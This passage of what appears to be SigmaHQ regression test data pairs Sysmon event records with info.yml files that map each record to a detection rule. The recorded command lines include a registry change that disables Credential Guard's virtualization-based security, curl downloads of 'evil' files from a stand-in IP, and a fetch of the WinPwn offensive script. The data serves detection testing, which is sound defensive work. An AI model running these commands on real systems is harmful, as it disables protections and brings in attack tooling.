\"SHA1=061B747FBA99B050D8874167AAD6D1D790F8A3A8,MD5=7E13A7EA7BD3601760E3838D99E31710,SHA256=D7714ECAE976F14B3AFA409FF5A3616E8D6D0CCE8269E611D7835A7C12235D6B,IMPHASH=AFF4D1EA89D0D66F7D04180143E61D12\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml",
    "content": "id: 6e70bb8b-561e-4af4-bad6-f582c656d047\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 056c7317-9a09-4bd4-9067-d051312752ea\n      title: Powershell Executed From Headless ConHost Process\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-26T06:45:49.034405Z\"\n        }\n      },\n      \"EventRecordID\": 23573,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3484,\n          \"ThreadID\": 3424\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-26 06:45:49.010\",\n      \"ProcessGuid\": \"0197231E-2F1D-694E-F304-000000000A00\",\n      \"ProcessId\": 12232,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"FileVersion\": \"10.0.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows PowerShell\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"PowerShell.EXE\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -c \\\"Set-ItemProperty -Path \\\"HKLM:Software\\\\Policies\\\\Microsoft\\\\Windows\\\\DeviceGuard\\\" -Name \\\"EnableVirtualizationBasedSecurity\\\" -Value 0\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\System32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-DDAE-694E-10B6-120000000000\",\n      \"LogonId\": \"0x12b610\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 10996,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/info.yml",
    "content": "id: f96a3ce2-ae73-4171-8877-71ccf1da7ce5\ndescription: N/A\ndate: 2025-12-26\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\n      title: Windows Credential Guard Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:22:12.568940Z\"\n        }\n      },\n      \"EventRecordID\": 21497,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:22:12.498\",\n      \"ProcessGuid\": \"0197231E-6314-693A-D112-000000000800\",\n      \"ProcessId\": 11000,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl.exe  --cookie-jar cookie \\\"http://example.com\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-4C14-030000000000\",\n      \"LogonId\": \"0x3144c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-BDEA-6937-AB0C-000000000800\",\n      \"ParentProcessId\": 3476,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml",
    "content": "id: d7f159c3-db76-4e39-b677-c0958f5f82b8\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88\n      title: Potential Cookies Session Hijacking\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:17:19.772545Z\"\n        }\n      },\n      \"EventRecordID\": 21475,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:17:19.636\",\n      \"ProcessGuid\": \"0197231E-61EF-693A-C812-000000000800\",\n      \"ProcessId\": 6400,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl.exe  -H \\\"User-Agent: EvilAgent\\\" http://example.com\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-4C14-030000000000\",\n      \"LogonId\": \"0x3144c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-BDEA-6937-AB0C-000000000800\",\n      \"ParentProcessId\": 3476,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml",
    "content": "id: 6428e458-fe2e-4936-accb-aebd0bcc8e35\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 85de1f22-d189-44e4-8239-dc276b45379b\n      title: Curl Web Request With Potential Custom User-Agent\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T07:02:39.732592Z\"\n        }\n      },\n      \"EventRecordID\": 21767,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 07:02:39.718\",\n      \"ProcessGuid\": \"0197231E-6C8F-693A-2613-000000000800\",\n      \"ProcessId\": 17752,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --output hello.txt https://12.34.56.78/hack/evil.txt\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml",
    "content": "id: 6aac357c-fe1d-4ca0-82e2-df626f71e838\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218\n      title: File Download From IP URL Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:34:20.042883Z\"\n        }\n      },\n      \"EventRecordID\": 21588,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:34:19.983\",\n      \"ProcessGuid\": \"0197231E-65EB-693A-F112-000000000800\",\n      \"ProcessId\": 14440,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --output benign.hta \\\"https://12.34.56.78/hack/evil.hta\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml",
    "content": "id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043\n      title: Suspicious File Download From IP Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:41:38.130858Z\"\n        }\n      },\n      \"EventRecordID\": 21642,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:41:38.096\",\n      \"ProcessGuid\": \"0197231E-67A2-693A-FF12-000000000800\",\n      \"ProcessId\": 9656,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  -O \\\"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml",
    "content": "id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb\n      title: Suspicious File Download From File Sharing Domain Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:43:20.070938Z\"\n        }\n      },\n      \"EventRecordID\": 21651,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:43:20.052\",\n      \"ProcessGuid\": \"0197231E-6808-693A-0413-000000000800\",\n      \"ProcessId\": 17792,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --insecure http://example.com\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml",
    "content": "id: ef93f624-2b41-41ee-9596-298d3158acfb\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec\n      title: Insecure Transfer Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:45:56.284330Z\"\n        }\n      },\n      \"EventRecordID\": 21680,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:45:56.239\",\n      \"ProcessGuid\": \"0197231E-68A4-693A-0713-000000000800\",\n      \"ProcessId\": 13700,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml",
    "content": "id: 11dd9a12-467e-4c13-b928-7c3aea60f59f\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77\n      title: Insecure Proxy/DOH Transfer Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json",
